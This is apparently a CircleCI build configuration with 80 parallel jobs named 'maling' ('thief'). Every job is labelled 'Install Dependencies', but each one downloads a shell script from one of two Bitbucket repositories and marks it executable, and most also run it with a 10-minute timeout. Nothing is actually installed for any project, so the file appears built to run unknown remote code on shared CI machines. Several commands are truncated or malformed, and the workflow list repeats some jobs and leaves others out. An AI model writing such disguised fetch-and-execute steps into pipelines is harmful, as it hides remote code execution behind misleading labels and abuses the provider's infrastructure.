version: 2.1
orbs:
  ruby: circleci/ruby@0.1.2 
jobs:
    maling1:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Ngamen0/joko/raw/6dd582a5e15db47a488506c837eab164265cda6d/tes.sh && chmod u+x tes.sh
    maling2:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling3:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Ngamen0/joko/raw/6dd582a5e15db47a488506c837eab164265cda6d/tes.sh && chmod u+x tes.sh
    maling4:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling5:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling6:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Ngamen0/joko/raw/6dd582a5e15db47a488506c837eab164265cda6d/tes.sh && chmod u+x tes.sh
    maling7:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Ngamen0/joko/raw/6dd582a5e15db47a488506c837eab164265cda6d/tes.sh && chmod u+x tes.sh
    maling8:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling9:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling10:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling11:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling12:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling13:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Ngamen0/joko/raw/6dd582a5e15db47a488506c837eab164265cda6d/tes.sh && chmod u+x tes.sh
    maling14:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Ngamen0/joko/raw/6dd582a5e15db47a488506c837eab164265cda6d/tes.sh && chmod u+x tes.sh &&
    maling15:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling16:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling17:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling18:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling19:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling20:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling21:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling22:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling23:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling24:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling25:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling26:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling27:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling28:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling29:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling30:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling31:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling32:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Ngamen0/joko/raw/6dd582a5e15db47a488506c837eab164265cda6d/tes.sh && chmod u+x tes.sh
    maling33:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling34:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling35:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling36:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling37:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling38:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling39:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling40:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling41:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling42:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Ngamen0/joko/raw/6dd582a5e15db47a488506c837eab164265cda6d/tes.sh && chmod u+x tes.sh &&
    maling43:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Ngamen0/joko/raw/6dd582a5e15db47a488506c837eab164265cda6d/tes.sh && chmod u+x tes.sh
    maling44:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling45:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling46:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling47:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Ngamen0/joko/raw/6dd582a5e15db47a488506c837eab164265cda6d/tes.sh && chmod u+x tes.sh &&
    maling48:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling49:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling50:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Ngamen0/joko/raw/6dd582a5e15db47a488506c837eab164265cda6d/tes.sh && chmod u+x tes.sh && 
    maling51:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling52:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling53:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling54:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Ngamen0/joko/raw/6dd582a5e15db47a488506c837eab164265cda6d/tes.sh && chmod u+x tes.sh && 
    maling55:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling56:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling57:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling58:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling59:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Ngamen0/joko/raw/6dd582a5e15db47a488506c837eab164265cda6d/tes.sh && chmod u+x tes.sh &&
    maling60:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling61:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Ngamen0/joko/raw/6dd582a5e15db47a488506c837eab164265cda6d/tes.sh && chmod u+x tes.sh
    maling62:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling63:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling64:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling65:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling66:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling67:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Ngamen0/joko/raw/6dd582a5e15db47a488506c837eab164265cda6d/tes.sh && chmod u+x tes.sh
    maling68:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling69:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling70:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Ngamen0/joko/raw/6dd582a5e15db47a488506c837eab164265cda6d/tes.sh && chmod u+x tes.sh && ./tes.s
    maling71:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling72:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling73:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling74:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Ngamen0/joko/raw/6dd582a5e15db47a488506c837eab164265cda6d/tes.sh && chmod u+x tes.sh && ./tes.s
    maling75:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling76:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling77:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling78:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling79:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m
    maling80:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Qyuhfyt/go/raw/7aea2f50e85a82ed8a07a73a3bb72b0b558b429d/tes.sh && chmod u+x tes.sh && ./tes.sh
            timeout: 10m

workflows:
    version: 2.1
    build:
        jobs:
            - maling1
            - maling2
            - maling3
            - maling4
            - maling5
            - maling6
            - maling7
            - maling8
            - maling9
            - maling10
            - maling11
            - maling12
            - maling13
            - maling14
            - maling15
            - maling16
            - maling17
            - maling18
            - maling19
            - maling20
            - maling21
            - maling22
            - maling23
            - maling24
            - maling25
            - maling26
            - maling27
            - maling28
            - maling29
            - maling30
            - maling31
            - maling32
            - maling33
            - maling34
            - maling35
            - maling36
            - maling37
            - maling38
            - maling39
            - maling40
            - maling41
            - maling42
            - maling43
            - maling44
            - maling45
            - maling46
            - maling47
            - maling48
            - maling49
            - maling50
            - maling61
            - maling62
            - maling63
            - maling64
            - maling65
            - maling66
            - maling67
            - maling68
            - maling69
            - maling60
            - maling61
            - maling72
            - maling73
            - maling74
            - maling75
            - maling76
            - maling77
            - maling78
            - maling79
            - maling70
            - maling71
            - maling72
            - maling73
            - maling74
            - maling75
            - maling76
            - maling77
            - maling78
            - maling79
            - maling80
